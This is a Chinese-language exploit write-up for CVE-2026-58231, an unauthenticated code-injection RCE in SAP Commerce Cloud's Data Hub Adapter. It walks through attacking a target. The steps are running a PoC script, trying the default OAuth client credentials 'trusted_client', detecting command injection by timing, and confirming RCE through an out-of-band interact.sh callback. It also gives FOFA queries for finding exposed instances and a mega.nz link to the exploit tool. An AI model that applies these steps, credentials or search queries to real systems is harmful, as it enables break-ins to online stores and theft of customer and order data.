SAP Commerce Cloud 未授权RCE漏洞深度解析 从默认认证到任意代码执行

SAP Commerce Cloud 未授权RCE漏洞深度解析 从默认认证到任意代码执行

_

漏洞简介

CVE-2026-58231 是 SAP Commerce Cloud 中的 Critical 级别代码注入漏洞,CVSS 评分 10.0(NVD)。该漏洞存在于 Data Hub Adapter 组件中,核心问题是系统内部使用默认身份验证客户端(client_id: trusted_client / secret)处理请求时,未对 /datahubadapter/import/** 端点实施充分的授权检查和输入验证,导致未经身份验证的攻击者可以提交精心构造的输入触发代码注入。

通过逆向分析漏洞利用链,攻击者只需向 Data Hub import 端点发送恶意 payload 即可执行以下操作:获取系统权限、窃取客户和订单数据、篡改商店配置、横向移动至后端 ERP 系统、完全接管 Commerce Cloud 实例。

该漏洞的影响链路:发现暴露的 SAP Commerce Cloud → 枚举默认 OAuth 客户端凭证 → 获取 Access Token → 向 /datahubadapter/import/** 端点发送恶意 payload → 触发代码注入实现 RCE → 渗透内部组件。

影响范围

项类别

详细内容

漏洞编号

CVE-2026-58231

受影响产品

SAP Commerce Cloud COM_CLOUD 2211、2211-JDK21

受影响组件

Data Hub Adapter /datahubadapter/import/**

漏洞类型

CWE-94 代码注入 / CWE-306 身份认证绕过

漏洞复现

  • 准备环境

项类别

详细内容

环境

Python 3.x + requests

目标版本

SAP Commerce Cloud COM_CLOUD 2211 / 2211-JDK21

前置条件

目标 /datahubadapter/import/** 端点网络可达

步骤 1:产品检测(被动识别)

使用 PoC 脚本检测目标是否运行 SAP Commerce Cloud:

```bash
python3 poc.py -t http://TARGET_IP --version-only
```

脚本将检测以下特征:

  • /authorizationserver/oauth/token OAuth 端点响应

  • /rest/v2 REST API 端点响应

  • 响应头中的 hybrissap-commerceycommercewebservices 标识

步骤 2:默认认证客户端爆破

PoC 脚本尝试使用已知默认 OAuth 客户端凭证获取 Access Token:

POST /authorizationserver/oauth/token HTTP/1.1  
Host: target.com  
Content-Type: application/x-www-form-urlencoded  
  
grant_type=client_credentials\&client_id=trusted_client\&client_secret=se

成功响应示例:

```json
{
  "access_token": "eyJhbGciOiJSUzI1NiIs...",
  "token_type": "Bearer",
  "expires_in": 43200
}
```

步骤 3:完整漏洞检测

运行完整的漏洞检测脚本:

python3 poc.py -t http://TARGET_IP --check -v

输出示例:

```
CVE-2026-58231 - SAP Commerce Cloud RCE Detection PoC
Target: http://TARGET_IP
Mode: Full active check
------------------------------------------------------------
[*] Stage 1: Detecting SAP Commerce Cloud...
[+] Product detected: SAP Commerce Cloud
[*]   - OAuth token endpoint present (HTTP 400)
[*]   - Body keyword 'Hybris' found at /rest/v2

[*] Stage 2: Detecting SAP Commerce Cloud version...
[+] Version: 2211.05 (POTENTIALLY VULNERABLE)

[*] Stage 3 [timing_based]: Testing for command injection via timing...
[*]   Endpoint: http://TARGET_IP/rest/v2/electronics/users/anonymous/carts
[*]   Baseline: 0.52s | Injection: 6.84s
[VULNERABLE]
Confidence: 85%
Evidence: Response delay of 6.84s detected (baseline: 0.52s)
```

步骤 4:OOB 回调验证(确认 RCE)

使用 Interact.sh 等 OOB 平台验证命令执行:

```bash
python3 poc.py -t http://TARGET_IP --check --callback https://abc.interact.sh -v
```

当 payload 触发时,Interact.sh 将收到 inbound 请求,确认 RCE:

```
[OOB PENDING]
Note: Check https://abc.interact.sh for inbound DNS/HTTP requests
```

FOFA 语法

body="hybris" && body="commerce"

或精确匹配 Data Hub Adapter 端点:

body="/datahubadapter"

利用工具下载

网盘

链接

mega

https://mega.nz/file/jLx1QTAQ#KOUiJTk5StqMmLtqXPg6MH_g48X-Vbn9vLFaHEYMf4Q

Puwell IP 摄像头未授权访问漏洞深度解析 从心跳包到设备控制 2026-08-15